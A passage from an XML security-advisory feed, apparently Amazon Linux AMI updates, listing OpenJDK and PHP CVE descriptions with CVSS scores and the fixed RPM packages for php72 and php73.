Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS v3.0 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
99999:
1790944: CVE-2020-2604 OpenJDK: Serialization filter changes via jdk.serialFilter property modification (Serialization, 8231422)
CVE-2020-2601:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Java SE, Java SE Embedded. While the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N).
99999:
1790570: CVE-2020-2601 OpenJDK: Use of unsafe RSA-MD5 checksum in Kerberos TGS (Security, 8229951)
CVE-2020-2593:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
99999:
1790884: CVE-2020-2593 OpenJDK: Incorrect isBuiltinStreamHandler check causing URL normalization issues (Networking, 8228548)
CVE-2020-2590:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
99999:
1790556: CVE-2020-2590 OpenJDK: Improper checks of SASL message properties in GssKrb5Base (Security, 8226352)
CVE-2020-2583:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1790444: CVE-2020-2583 OpenJDK: Incorrect exception processing during deserialization in BeanContextSupport (Serialization, 8224909)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2583" title="" id="CVE-2020-2583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2590" title="" id="CVE-2020-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2593" title="" id="CVE-2020-2593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2601" title="" id="CVE-2020-2601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2604" title="" id="CVE-2020-2604" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2654" title="" id="CVE-2020-2654" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2659" title="" id="CVE-2020-2659" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.242.b08-0.50.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" 
arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.242.b08-0.50.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.242.b08-0.50.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.242.b08" release="0.50.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.242.b08-0.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1346</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1346: medium priority package update for php72</title><issued date="2020-02-24 21:41:00" /><updated date="2020-02-27 18:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7060:
When using certain mbstring functions to convert multibyte encodings, in PHP versions 7.2.x below 7.2.27, 7.3.x below 7.3.14 and 7.4.x below 7.4.2 it is possible to supply data that will cause the function mbfl_filt_conv_big5_wchar to read past the allocated buffer. This may lead to information disclosure or a crash.
1797779: CVE-2020-7060 php: Global buffer-overflow in mbfl_filt_conv_big5_wchar function
CVE-2020-7059:
When using the fgetss() function to read data while stripping tags, in PHP versions 7.2.x below 7.2.27, 7.3.x below 7.3.14 and 7.4.x below 7.4.2 it is possible to supply data that will cause this function to read past the allocated buffer. This may lead to information disclosure or a crash.
1797776: CVE-2020-7059 php: Out of bounds read in php_strip_tags_ex
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7059" title="" id="CVE-2020-7059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7060" title="" id="CVE-2020-7060" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.27" release="1.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-enchant-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.27" 
release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.27" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.27-1.20.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.27" release="1.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-xmlrpc-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.27" release="1.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-pdo-dblib-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.27" release="1.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-xml-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.27-1.20.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.27" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.27-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1347</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1347: medium priority package update for php73</title><issued date="2020-02-24 21:41:00" /><updated date="2020-02-27 18:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7060:
When using certain mbstring functions to convert multibyte encodings, in PHP versions 7.2.x below 7.2.27, 7.3.x below 7.3.14 and 7.4.x below 7.4.2 it is possible to supply data that will cause the function mbfl_filt_conv_big5_wchar to read past the allocated buffer. This may lead to information disclosure or a crash.
1797779: CVE-2020-7060 php: Global buffer-overflow in mbfl_filt_conv_big5_wchar function
CVE-2020-7059:
When using the fgetss() function to read data while stripping tags, in PHP versions 7.2.x below 7.2.27, 7.3.x below 7.3.14 and 7.4.x below 7.4.2 it is possible to supply data that will cause this function to read past the allocated buffer. This may lead to information disclosure or a crash.
1797776: CVE-2020-7059 php: Out of bounds read in php_strip_tags_ex
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7059" title="" id="CVE-2020-7059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7060" title="" id="CVE-2020-7060" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-mysqlnd" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.14" release="1.23.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-enchant-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.14" 
release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.14" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.14-1.23.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.14" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-embedded-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.14" release="1.23.amzn1" epoch="0" 